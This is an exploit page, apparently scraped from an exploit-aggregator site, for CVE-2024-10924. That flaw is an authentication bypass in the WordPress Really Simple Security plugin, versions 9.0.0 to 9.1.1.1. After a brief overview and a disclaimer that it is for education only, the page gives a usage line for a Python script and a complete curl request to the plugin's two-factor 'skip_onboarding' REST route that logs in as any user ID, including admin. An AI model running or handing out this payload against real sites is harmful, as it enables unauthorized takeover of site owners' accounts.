## https://sploitus.com/exploit?id=A2B4A1AB-D993-5877-9805-E91F96964647
# Exploit for CVE-2024-10924 (WordPress Really Simple Security Plugin - Authentication Bypass)
## ๐ Overview
CVE-2024-10924 is a critical authentication bypass vulnerability in the Really Simple Security plugin for WordPress (versions 9.0.0 to 9.1.1.1). This vulnerability allows unauthenticated attackers to log in as any user (including admin) by exploiting a flaw in the Two-Factor Authentication (2FA) API.
#### CVE ID: CVE-2024-10924
#### Severity: ๐ฅ Critical (CVSS 9.8)
#### Affected Versions: Really Simple Security 9.0.0 โ 9.1.1.1
#### Patched Version: 9.1.2
#### Exploit Type: Authentication Bypass
# โ ๏ธ Disclaimer
## ๐จ This exploit is for educational and security research purposes only.
## Unauthorized use on systems you do not own is illegal. The goal is to help security professionals test and patch vulnerable systems.
# ๐ง Requirements
A WordPress site running a vulnerable version of the Really Simple Security plugin.
Python 3.x or cURL installed for testing.
The target WordPress admin username (user enumeration may be required).
# Run the script:
# python3 exploit.py <url example : http://target.com> <user_id>
# manully with Curl
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v